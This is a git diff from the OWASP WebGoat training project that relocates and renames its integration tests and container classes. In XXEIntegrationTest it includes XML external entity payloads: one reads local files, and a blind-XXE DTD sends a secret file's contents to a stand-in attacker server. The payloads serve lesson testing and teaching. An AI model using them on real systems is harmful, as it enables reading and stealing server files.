driver.findElements(By.name("query")).get(1).submit(); driver.findElements(By.name("query")).get(1).submit();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3"));
driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonTest.sql_4_drop); driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_drop);
driver.findElements(By.name("query")).get(2).submit(); driver.findElements(By.name("query")).get(2).submit();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3"));
driver.findElements(By.name("query")).get(2).clear(); driver.findElements(By.name("query")).get(2).clear();
driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonTest.sql_4_add); driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_add);
driver.findElements(By.name("query")).get(2).submit(); driver.findElements(By.name("query")).get(2).submit();
driver.findElements(By.name("query")).get(2).clear(); driver.findElements(By.name("query")).get(2).clear();
driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonTest.sql_4_drop); driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_drop);
driver.findElements(By.name("query")).get(2).submit(); driver.findElements(By.name("query")).get(2).submit();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/4")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/4"));
driver.findElements(By.name("query")).get(3).sendKeys(SqlInjectionLessonTest.sql_5); driver.findElements(By.name("query")).get(3).sendKeys(SqlInjectionLessonIntegrationTest.sql_5);
driver.findElements(By.name("query")).get(3).submit(); driver.findElements(By.name("query")).get(3).submit();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/8")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/8"));
@ -103,8 +103,8 @@ public class SeleniumTest extends IntegrationTest {
driver.findElement(By.name("Get Account Info")).click(); driver.findElement(By.name("Get Account Info")).click();
driver.get(url("/start.mvc#lesson/SqlInjection.lesson/9")); driver.get(url("/start.mvc#lesson/SqlInjection.lesson/9"));
driver.findElement(By.name("userid")).sendKeys(SqlInjectionLessonTest.sql_10_userid); driver.findElement(By.name("userid")).sendKeys(SqlInjectionLessonIntegrationTest.sql_10_userid);
driver.findElement(By.name("login_count")).sendKeys(SqlInjectionLessonTest.sql_10_login_count); driver.findElement(By.name("login_count")).sendKeys(SqlInjectionLessonIntegrationTest.sql_10_login_count);
driver.findElements(By.name("Get Account Info")).get(1).click(); driver.findElements(By.name("Get Account Info")).get(1).click();
} }

4
webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java → src/it/java/org/owasp/webgoat/SessionManagementIntegrationTest.java
View File

@ -33,7 +33,7 @@ import org.junit.jupiter.api.Test;
* *
*/ */
class SessionManagementTest extends IntegrationTest { class SessionManagementIT extends IntegrationTest {
private static final String HIJACK_LOGIN_CONTEXT_PATH = "/WebGoat/HijackSession/login"; private static final String HIJACK_LOGIN_CONTEXT_PATH = "/WebGoat/HijackSession/login";
@ -42,6 +42,6 @@ class SessionManagementTest extends IntegrationTest {
void hijackSessionTest() { void hijackSessionTest() {
startLesson("HijackSession"); startLesson("HijackSession");
checkAssignment(HIJACK_LOGIN_CONTEXT_PATH, Map.of("username", "webgoat", "password", "webgoat"), false); checkAssignment(url(HIJACK_LOGIN_CONTEXT_PATH), Map.of("username", "webgoat", "password", "webgoat"), false);
} }
} }

2
webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionAdvancedTest.java → src/it/java/org/owasp/webgoat/SqlInjectionAdvancedIntegrationTest.java
View File

@ -5,7 +5,7 @@ import java.util.Map;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
public class SqlInjectionAdvancedTest extends IntegrationTest { public class SqlInjectionAdvancedIntegrationTest extends IntegrationTest {
@Test @Test
public void runTests() { public void runTests() {

2
webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionLessonTest.java → src/it/java/org/owasp/webgoat/SqlInjectionLessonIntegrationTest.java
View File

@ -5,7 +5,7 @@ import java.util.Map;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
public class SqlInjectionLessonTest extends IntegrationTest { public class SqlInjectionLessonIntegrationTest extends IntegrationTest {
public static final String sql_2 = "select department from employees where last_name='Franco'"; public static final String sql_2 = "select department from employees where last_name='Franco'";
public static final String sql_3 = "update employees set department='Sales' where last_name='Barnett'"; public static final String sql_3 = "update employees set department='Sales' where last_name='Barnett'";

4
webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java → src/it/java/org/owasp/webgoat/SqlInjectionMitigationIntegrationTest.java
View File

@ -10,7 +10,7 @@ import org.junit.jupiter.api.Test;
import static org.hamcrest.CoreMatchers.containsString; import static org.hamcrest.CoreMatchers.containsString;
public class SqlInjectionMitigationTest extends IntegrationTest { public class SqlInjectionMitigationIntegrationTest extends IntegrationTest {
@Test @Test
public void runTests() { public void runTests() {
@ -59,7 +59,7 @@ public class SqlInjectionMitigationTest extends IntegrationTest {
.get(url("/WebGoat/SqlInjectionMitigations/servers?column=unknown")) .get(url("/WebGoat/SqlInjectionMitigations/servers?column=unknown"))
.then() .then()
.statusCode(500) .statusCode(500)
.body("trace", containsString("select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by")); .body("trace", containsString("select id, hostname, ip, mac, status, description from SERVERS where status <> 'out of order' order by"));
params.clear(); params.clear();
params.put("ip", "104.130.219.202"); params.put("ip", "104.130.219.202");

6
webgoat-integration-tests/src/test/java/org/owasp/webgoat/WebWolfTest.java → src/it/java/org/owasp/webgoat/WebWolfIntegrationTest.java
View File

@ -10,7 +10,7 @@ import org.junit.jupiter.api.Test;
import io.restassured.RestAssured; import io.restassured.RestAssured;
public class WebWolfTest extends IntegrationTest { public class WebWolfIntegrationTest extends IntegrationTest {
@Test @Test
public void runTests() throws IOException { public void runTests() throws IOException {
@ -19,7 +19,7 @@ public class WebWolfTest extends IntegrationTest {
//Assignment 3 //Assignment 3
Map<String, Object> params = new HashMap<>(); Map<String, Object> params = new HashMap<>();
params.clear(); params.clear();
params.put("email", getWebgoatUser()+"@webgoat.org"); params.put("email", this.getUser()+"@webgoat.org");
checkAssignment(url("/WebGoat/WebWolf/mail/send"), params, false); checkAssignment(url("/WebGoat/WebWolf/mail/send"), params, false);
String responseBody = RestAssured.given() String responseBody = RestAssured.given()
@ -31,7 +31,7 @@ public class WebWolfTest extends IntegrationTest {
.extract().response().getBody().asString(); .extract().response().getBody().asString();
String uniqueCode = responseBody.replace("%20", " "); String uniqueCode = responseBody.replace("%20", " ");
uniqueCode = uniqueCode.substring(21+uniqueCode.lastIndexOf("your unique code is: "),uniqueCode.lastIndexOf("your unique code is: ")+(21+getWebgoatUser().length())); uniqueCode = uniqueCode.substring(21+uniqueCode.lastIndexOf("your unique code is: "),uniqueCode.lastIndexOf("your unique code is: ")+(21+ this.getUser().length()));
params.clear(); params.clear();
params.put("uniqueCode", uniqueCode); params.put("uniqueCode", uniqueCode);
checkAssignment(url("/WebGoat/WebWolf/mail"), params, true); checkAssignment(url("/WebGoat/WebWolf/mail"), params, true);

2
webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java → src/it/java/org/owasp/webgoat/XSSIntegrationTest.java
View File

@ -7,7 +7,7 @@ import java.util.Map;
import org.junit.jupiter.api.Test; import org.junit.jupiter.api.Test;
public class XSSTest extends IntegrationTest { public class XSSIntegrationTest extends IntegrationTest {
@Test @Test

76
webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java → src/it/java/org/owasp/webgoat/XXEIntegrationTest.java
View File

@ -1,35 +1,27 @@
package org.owasp.webgoat; package org.owasp.webgoat;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import org.junit.jupiter.api.Test;
import java.io.IOException; import java.io.IOException;
import java.nio.file.Files; import java.nio.file.Files;
import java.nio.file.Path; import java.nio.file.Path;
import java.nio.file.Paths; import java.nio.file.Paths;
import org.junit.jupiter.api.Test; public class XXEIntegrationTest extends IntegrationTest {
import io.restassured.RestAssured; private static final String xxe3 = """
import io.restassured.http.ContentType; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>""";
private static final String xxe4 = """
public class XXETest extends IntegrationTest { <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>""";
private static final String dtd7 = """
private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>"; <?xml version="1.0" encoding="UTF-8"?><!ENTITY % file SYSTEM "file:SECRET"><!ENTITY % all "<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>">%all;""";
private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>"; private static final String xxe7 = """
private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;"; <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "WEBWOLFURL/USERNAME/blind.dtd">%remote;]><comment><text>test&send;</text></comment>""";
private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
private String webGoatHomeDirectory; private String webGoatHomeDirectory;
private String webwolfFileDir; private String webWolfFileServerLocation;
@Test
public void runTests() throws IOException {
startLesson("XXE");
webGoatHomeDirectory = getWebGoatServerPath();
webwolfFileDir = getWebWolfServerPath();
checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, true);
checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, true);
checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", true);
checkResults("xxe/");
}
/* /*
* This test is to verify that all is secure when XXE security patch is applied. * This test is to verify that all is secure when XXE security patch is applied.
@ -37,10 +29,15 @@ public class XXETest extends IntegrationTest {
@Test @Test
public void xxeSecure() throws IOException { public void xxeSecure() throws IOException {
startLesson("XXE"); startLesson("XXE");
webGoatHomeDirectory = getWebGoatServerPath(); webGoatHomeDirectory = webGoatServerDirectory();
webwolfFileDir = getWebWolfServerPath(); webWolfFileServerLocation = getWebWolfFileServerLocation();
RestAssured.given().when().relaxedHTTPSValidation() RestAssured.given()
.cookie("JSESSIONID", getWebGoatCookie()).get(url("/xxe/applysecurity")); .when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/enable-security.mvc"))
.then()
.statusCode(200);
checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, false); checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, false);
checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, false); checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, false);
checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", false); checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", false);
@ -54,11 +51,11 @@ public class XXETest extends IntegrationTest {
*/ */
private String getSecret() throws IOException { private String getSecret() throws IOException {
//remove any left over DTD //remove any left over DTD
Path webWolfFilePath = Paths.get(webwolfFileDir); Path webWolfFilePath = Paths.get(webWolfFileServerLocation);
if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(), "blind.dtd")).toFile().exists()) { if (webWolfFilePath.resolve(Paths.get(this.getUser(), "blind.dtd")).toFile().exists()) {
Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(), "blind.dtd"))); Files.delete(webWolfFilePath.resolve(Paths.get(this.getUser(), "blind.dtd")));
} }
String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt"); String secretFile = webGoatHomeDirectory.concat("/XXE/" + getUser() + "/secret.txt");
String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile); String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
//upload DTD //upload DTD
@ -67,12 +64,12 @@ public class XXETest extends IntegrationTest {
.relaxedHTTPSValidation() .relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie()) .cookie("WEBWOLFSESSION", getWebWolfCookie())
.multiPart("file", "blind.dtd", dtd7String.getBytes()) .multiPart("file", "blind.dtd", dtd7String.getBytes())
.post(webWolfUrl("/WebWolf/fileupload")) .post(webWolfUrl("/fileupload"))
.then() .then()
.extract().response().getBody().asString(); .extract().response().getBody().asString();
//upload attack //upload attack
String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser()); String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", this.getUser());
checkAssignment(url("/WebGoat/xxe/blind?send=test"), ContentType.XML, xxe7String, false); checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, xxe7String, false);
//read results from WebWolf //read results from WebWolf
String result = RestAssured.given() String result = RestAssured.given()
@ -84,8 +81,19 @@ public class XXETest extends IntegrationTest {
.extract().response().getBody().asString(); .extract().response().getBody().asString();
result = result.replace("%20", " "); result = result.replace("%20", " ");
if (-1 != result.lastIndexOf("WebGoat 8.0 rocks... (")) { if (-1 != result.lastIndexOf("WebGoat 8.0 rocks... (")) {
result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("), result.lastIndexOf("WebGoat 8.0 rocks... (") + 33); result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("), result.lastIndexOf("WebGoat 8.0 rocks... (") + 33);
} }
return result; return result;
} }
@Test
public void runTests() throws IOException {
startLesson("XXE", true);
webGoatHomeDirectory = webGoatServerDirectory();
webWolfFileServerLocation = getWebWolfFileServerLocation();
checkAssignment(url("/WebGoat/xxe/simple"), ContentType.XML, xxe3, true);
checkAssignment(url("/WebGoat/xxe/content-type"), ContentType.XML, xxe4, true);
checkAssignment(url("/WebGoat/xxe/blind"), ContentType.XML, "<comment><text>" + getSecret() + "</text></comment>", true);
checkResults("xxe/");
}
} }

1
webgoat-lessons/insecure-deserialization/src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java → src/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java
View File

@ -10,6 +10,7 @@ import java.io.Serializable;
import java.time.LocalDateTime; import java.time.LocalDateTime;
@Slf4j @Slf4j
//TODO move back to lesson
public class VulnerableTaskHolder implements Serializable { public class VulnerableTaskHolder implements Serializable {
private static final long serialVersionUID = 2; private static final long serialVersionUID = 2;

3
webgoat-container/src/main/java/org/owasp/webgoat/AjaxAuthenticationEntryPoint.java → src/main/java/org/owasp/webgoat/container/AjaxAuthenticationEntryPoint.java
View File

@ -27,7 +27,7 @@
* for free software projects. * for free software projects.
*/ */
package org.owasp.webgoat; package org.owasp.webgoat.container;
import org.springframework.security.core.AuthenticationException; import org.springframework.security.core.AuthenticationException;
import org.springframework.security.web.authentication.LoginUrlAuthenticationEntryPoint; import org.springframework.security.web.authentication.LoginUrlAuthenticationEntryPoint;
@ -48,6 +48,7 @@ public class AjaxAuthenticationEntryPoint extends LoginUrlAuthenticationEntryPoi
super(loginFormUrl); super(loginFormUrl);
} }
@Override
public void commence(HttpServletRequest request, HttpServletResponse response, AuthenticationException authException) throws IOException, ServletException { public void commence(HttpServletRequest request, HttpServletResponse response, AuthenticationException authException) throws IOException, ServletException {
if (request.getHeader("x-requested-with") != null) { if (request.getHeader("x-requested-with") != null) {
response.sendError(401, authException.getMessage()); response.sendError(401, authException.getMessage());

64
webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java → src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
View File

@ -29,13 +29,18 @@
* @since December 12, 2015 * @since December 12, 2015
*/ */
package org.owasp.webgoat; package org.owasp.webgoat.container;
import lombok.extern.slf4j.Slf4j; import lombok.extern.slf4j.Slf4j;
import org.asciidoctor.Asciidoctor; import org.asciidoctor.Asciidoctor;
import org.asciidoctor.extension.JavaExtensionRegistry; import org.asciidoctor.extension.JavaExtensionRegistry;
import org.owasp.webgoat.asciidoc.*; import org.owasp.webgoat.container.asciidoc.OperatingSystemMacro;
import org.owasp.webgoat.i18n.Language; import org.owasp.webgoat.container.asciidoc.UsernameMacro;
import org.owasp.webgoat.container.asciidoc.WebGoatTmpDirMacro;
import org.owasp.webgoat.container.asciidoc.WebGoatVersionMacro;
import org.owasp.webgoat.container.asciidoc.WebWolfMacro;
import org.owasp.webgoat.container.asciidoc.WebWolfRootMacro;
import org.springframework.core.io.ResourceLoader;
import org.thymeleaf.IEngineConfiguration; import org.thymeleaf.IEngineConfiguration;
import org.thymeleaf.templateresolver.FileTemplateResolver; import org.thymeleaf.templateresolver.FileTemplateResolver;
import org.thymeleaf.templateresource.ITemplateResource; import org.thymeleaf.templateresource.ITemplateResource;
@ -63,55 +68,34 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
private static final Asciidoctor asciidoctor = create(); private static final Asciidoctor asciidoctor = create();
private static final String PREFIX = "doc:"; private static final String PREFIX = "doc:";
private final Language language; private final ResourceLoader resourceLoader;
public AsciiDoctorTemplateResolver(Language language) { public AsciiDoctorTemplateResolver(ResourceLoader resourceLoader) {
this.language = language; this.resourceLoader = resourceLoader;
setResolvablePatterns(Set.of(PREFIX + "*")); setResolvablePatterns(Set.of(PREFIX + "*"));
} }
@Override @Override
protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) { protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
var templateName = resourceName.substring(PREFIX.length()); var templateName = resourceName.substring(PREFIX.length());
try (InputStream is = readInputStreamOrFallbackToEnglish(templateName, language)) {
if (is == null) {
log.warn("Resource name: {} not found, did you add the adoc file?", templateName);
return new StringTemplateResource("");
} else {
JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
extensionRegistry.inlineMacro("webGoatTempDir", WebGoatTmpDirMacro.class);
extensionRegistry.inlineMacro("operatingSystem", OperatingSystemMacro.class);
extensionRegistry.inlineMacro("username", UsernameMacro.class);
StringWriter writer = new StringWriter(); try (InputStream is = resourceLoader.getResource("classpath:/" + templateName).getInputStream()) {
asciidoctor.convert(new InputStreamReader(is), writer, createAttributes()); JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
return new StringTemplateResource(writer.getBuffer().toString()); extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
} extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
extensionRegistry.inlineMacro("webGoatTempDir", WebGoatTmpDirMacro.class);
extensionRegistry.inlineMacro("operatingSystem", OperatingSystemMacro.class);
extensionRegistry.inlineMacro("username", UsernameMacro.class);
StringWriter writer = new StringWriter();
asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
return new StringTemplateResource(writer.getBuffer().toString());
} catch (IOException e) { } catch (IOException e) {
//no html yet return new StringTemplateResource("<div>Unable to find documentation for: " + templateName + " </div>");
return new StringTemplateResource("");
} }
} }
/**
* The resource name is for example HttpBasics_content1.adoc. This is always located in the following directory:
* <code>plugin/HttpBasics/lessonPlans/en/HttpBasics_content1.adoc</code>
*/
private String computeResourceName(String resourceName, String language) {
return String.format("lessonPlans/%s/%s", language, resourceName);
}
private InputStream readInputStreamOrFallbackToEnglish(String resourceName, Language language) {
InputStream is = Thread.currentThread().getContextClassLoader().getResourceAsStream(computeResourceName(resourceName, language.getLocale().getLanguage()));
if (is == null) {
is = Thread.currentThread().getContextClassLoader().getResourceAsStream(computeResourceName(resourceName, "en"));
}
return is;
}
private Map<String, Object> createAttributes() { private Map<String, Object> createAttributes() {
Map<String, Object> attributes = new HashMap<>(); Map<String, Object> attributes = new HashMap<>();
attributes.put("source-highlighter", "coderay"); attributes.put("source-highlighter", "coderay");

68
src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java Normal file
View File

@ -0,0 +1,68 @@
package org.owasp.webgoat.container;
import lombok.RequiredArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import org.flywaydb.core.Flyway;
import org.owasp.webgoat.container.lessons.LessonScanner;
import org.owasp.webgoat.container.service.RestartLessonService;
import org.springframework.boot.autoconfigure.jdbc.DataSourceProperties;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.Primary;
import org.springframework.jdbc.datasource.DriverManagerDataSource;
import javax.sql.DataSource;
import java.util.Map;
import java.util.function.Function;
@Configuration
@RequiredArgsConstructor
@Slf4j
public class DatabaseConfiguration {
private final DataSourceProperties properties;
private final LessonScanner lessonScanner;
@Bean
@Primary
public DataSource dataSource() {
DriverManagerDataSource dataSource = new DriverManagerDataSource();
dataSource.setDriverClassName(properties.getDriverClassName());
dataSource.setUrl(properties.getUrl());
dataSource.setUsername(properties.getUsername());
dataSource.setPassword(properties.getPassword());
return dataSource;
}
/**
* Define 2 Flyway instances, 1 for WebGoat itself which it uses for internal storage like users and 1 for lesson
* specific tables we use. This way we clean the data in the lesson database quite easily see {@link RestartLessonService#restartLesson()}
* for how we clean the lesson related tables.
*/
@Bean(initMethod = "migrate")
public Flyway flyWayContainer() {
return Flyway
.configure()
.configuration(Map.of("driver", properties.getDriverClassName()))
.dataSource(dataSource())
.schemas("container")
.locations("db/container")
.load();
}
@Bean
public Function<String, Flyway> flywayLessons(LessonDataSource lessonDataSource) {
return schema -> Flyway
.configure()
.configuration(Map.of("driver", properties.getDriverClassName()))
.schemas(schema)
.dataSource(lessonDataSource)
.locations("lessons")
.load();
}
@Bean
public LessonDataSource lessonDataSource() {
return new LessonDataSource(dataSource());
}
}

10
webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java → src/main/java/org/owasp/webgoat/container/HammerHead.java
View File

@ -1,16 +1,12 @@
package org.owasp.webgoat; package org.owasp.webgoat.container;
import lombok.AllArgsConstructor; import lombok.AllArgsConstructor;
import org.owasp.webgoat.session.Course; import org.owasp.webgoat.container.session.Course;
import org.springframework.security.core.Authentication;
import org.springframework.stereotype.Controller; import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.ModelAndView;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
/** /**
* ************************************************************************************************* * *************************************************************************************************
* <p> * <p>
@ -55,7 +51,7 @@ public class HammerHead {
* Entry point for WebGoat, redirects to the first lesson found within the course. * Entry point for WebGoat, redirects to the first lesson found within the course.
*/ */
@RequestMapping(path = "/attack", method = {RequestMethod.GET, RequestMethod.POST}) @RequestMapping(path = "/attack", method = {RequestMethod.GET, RequestMethod.POST})
public ModelAndView attack(Authentication authentication, HttpServletRequest request, HttpServletResponse response) { public ModelAndView attack() {
return new ModelAndView("redirect:" + "start.mvc" + course.getFirstLesson().getLink()); return new ModelAndView("redirect:" + "start.mvc" + course.getFirstLesson().getLink());
} }
} }

4
webgoat-container/src/main/java/org/owasp/webgoat/LessonDataSource.java → src/main/java/org/owasp/webgoat/container/LessonDataSource.java
View File

@ -1,6 +1,6 @@
package org.owasp.webgoat; package org.owasp.webgoat.container;
import org.owasp.webgoat.lessons.LessonConnectionInvocationHandler; import org.owasp.webgoat.container.lessons.LessonConnectionInvocationHandler;
import org.springframework.jdbc.datasource.ConnectionProxy; import org.springframework.jdbc.datasource.ConnectionProxy;
import javax.sql.DataSource; import javax.sql.DataSource;

16
webgoat-container/src/main/java/org/owasp/webgoat/LessonTemplateResolver.java → src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
View File

@ -29,8 +29,9 @@
* @since October 28, 2003 * @since October 28, 2003
*/ */
package org.owasp.webgoat; package org.owasp.webgoat.container;
import lombok.extern.slf4j.Slf4j;
import org.springframework.core.io.ResourceLoader; import org.springframework.core.io.ResourceLoader;
import org.thymeleaf.IEngineConfiguration; import org.thymeleaf.IEngineConfiguration;
import org.thymeleaf.templateresolver.FileTemplateResolver; import org.thymeleaf.templateresolver.FileTemplateResolver;
@ -47,11 +48,12 @@ import java.util.Set;
* Dynamically resolve a lesson. In the html file this can be invoked as: * Dynamically resolve a lesson. In the html file this can be invoked as:
* *
* <code> * <code>
* <div th:case="true" th:replace="lesson:__${lesson.class.simpleName}__"></div> * <div th:case="true" th:replace="lesson:__${lesson.class.simpleName}__"></div>
* </code> * </code>
* * <p>
* Thymeleaf will invoke this resolver based on the prefix and this implementation will resolve the html in the plugins directory * Thymeleaf will invoke this resolver based on the prefix and this implementation will resolve the html in the plugins directory
*/ */
@Slf4j
public class LessonTemplateResolver extends FileTemplateResolver { public class LessonTemplateResolver extends FileTemplateResolver {
private static final String PREFIX = "lesson:"; private static final String PREFIX = "lesson:";
@ -65,15 +67,15 @@ public class LessonTemplateResolver extends FileTemplateResolver {
@Override @Override
protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) { protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
var templateName = resourceName.substring(PREFIX.length());; var templateName = resourceName.substring(PREFIX.length());
byte[] resource = resources.get(templateName); byte[] resource = resources.get(templateName);
if (resource == null) { if (resource == null) {
try { try {
resource = resourceLoader.getResource("classpath:/html/" + templateName + ".html").getInputStream().readAllBytes(); resource = resourceLoader.getResource("classpath:/" + templateName).getInputStream().readAllBytes();
} catch (IOException e) { } catch (IOException e) {
e.printStackTrace(); log.error("Unable to find lesson HTML: {}", template);
} }
resources.put(resourceName, resource); resources.put(templateName, resource);
} }
return new StringTemplateResource(new String(resource, StandardCharsets.UTF_8)); return new StringTemplateResource(new String(resource, StandardCharsets.UTF_8));
} }

96
webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java → src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
View File

@ -29,39 +29,51 @@
* @since October 28, 2003 * @since October 28, 2003
*/ */
package org.owasp.webgoat; package org.owasp.webgoat.container;
import org.owasp.webgoat.i18n.Language; import lombok.RequiredArgsConstructor;
import org.owasp.webgoat.i18n.Messages; import org.owasp.webgoat.container.i18n.Language;
import org.owasp.webgoat.i18n.PluginMessages; import org.owasp.webgoat.container.i18n.Messages;
import org.owasp.webgoat.session.LabelDebugger; import org.owasp.webgoat.container.i18n.PluginMessages;
import org.owasp.webgoat.container.lessons.LessonScanner;
import org.owasp.webgoat.container.session.LabelDebugger;
import org.springframework.context.ApplicationContext; import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Configuration;
import org.springframework.core.io.ResourceLoader; import org.springframework.core.io.ResourceLoader;
import org.springframework.core.io.support.ResourcePatternResolver;
import org.springframework.web.servlet.LocaleResolver; import org.springframework.web.servlet.LocaleResolver;
import org.springframework.web.servlet.ViewResolver; import org.springframework.web.servlet.ViewResolver;
import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry; import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
import org.springframework.web.servlet.config.annotation.ViewControllerRegistry; import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer; import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
import org.springframework.web.servlet.i18n.SessionLocaleResolver; import org.springframework.web.servlet.i18n.SessionLocaleResolver;
import org.thymeleaf.TemplateEngine; import org.thymeleaf.IEngineConfiguration;
import org.thymeleaf.extras.springsecurity5.dialect.SpringSecurityDialect; import org.thymeleaf.extras.springsecurity5.dialect.SpringSecurityDialect;
import org.thymeleaf.spring5.SpringTemplateEngine; import org.thymeleaf.spring5.SpringTemplateEngine;
import org.thymeleaf.spring5.templateresolver.SpringResourceTemplateResolver; import org.thymeleaf.spring5.templateresolver.SpringResourceTemplateResolver;
import org.thymeleaf.spring5.view.ThymeleafViewResolver; import org.thymeleaf.spring5.view.ThymeleafViewResolver;
import org.thymeleaf.templatemode.TemplateMode; import org.thymeleaf.templatemode.TemplateMode;
import org.thymeleaf.templateresolver.FileTemplateResolver;
import org.thymeleaf.templateresolver.ITemplateResolver; import org.thymeleaf.templateresolver.ITemplateResolver;
import org.thymeleaf.templateresource.ITemplateResource;
